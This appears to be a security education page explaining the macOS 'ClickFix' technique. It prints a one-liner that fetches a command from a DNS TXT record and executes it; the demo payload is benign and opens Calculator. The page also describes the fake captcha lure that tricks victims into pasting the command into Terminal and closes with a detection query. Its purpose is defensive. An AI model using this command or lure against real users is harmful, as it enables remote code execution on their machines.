Clickfix DNS (Mac)

Execute commands via DNS TXT records on macOS. The entire payload comes from DNS, nothing hardcoded.

This command runs on macOS
Example Command breakdown
Hover over highlighted segments to see what each part does.
$(dig +short TXT clickfix-dns-mac.intel.cx| tr -d '"')
1Command substitution

Starts command substitution. The output of the inner command will be executed as a shell command.

$(
2DNS TXT lookup

Fetches the TXT record for the domain. The record contains the full payload: open -a Calculator.

dig +short TXT clickfix-dns-mac.intel.cx
3Strip quotes

Removes the quotes that dig adds around TXT values to get a clean command string.

| tr -d '"'
4Close substitution

Closes the command substitution. Whatever the TXT record contains is executed as a shell command.

)
How it works
The attack chain from victim execution to payload delivery on macOS
  1. 1

    Victim runs the command

    The bash one-liner is presented on a fake “support” or “fix” page. The page copies the command to the clipboard, then prompts the victim to open Terminal (Cmd+Space, type “Terminal”, Enter), paste with Cmd+V, and press Enter to run.

  2. 2

    DNS TXT lookup

    dig +short TXT clickfix-dns-mac.intel.cx fetches the TXT record. It contains the full command: open -a Calculator.

  3. 3

    Execute

    tr -d '"' strips quotes. Command substitution runs whatever the TXT record contains, attacker-controlled, no hardcoded payload.

Implications
Why this technique is effective and hard to defend against
  • One-liner. A single command is easy to paste and run. Low friction for the victim.
  • Seems legitimate. Victims are used to captchas and security checks online. A fake reCAPTCHA-style prompt feels familiar and trustworthy, lowering suspicion.
  • No hardcoded payload. The command contains no executable, script, or URL, only a domain name. Static analysis and signatures miss it.
  • Flexible execution. The DNS record can point to any command (e.g. open, curl, bash). The attacker decides at DNS level.
  • Attacker-controlled at any time. Change the CNAME record and the same command now delivers a different payload. No need to redistribute links or documents.
Interactive demo
Experience the clickfix flow: a fake security check prompts you to open Terminal (Cmd+Space), paste (Cmd+V), and press Enter.Note: The command is copied to your clipboard in the background when you click verify, with no prompt and no explicit user interaction. This is how real clickfix attacks work.
Launch demo
Hunting
Detection queries for bash/dig DNS TXT execution
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine contains "dig"
  and ProcessCommandLine contains "TXT"
  and ProcessCommandLine contains "tr"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine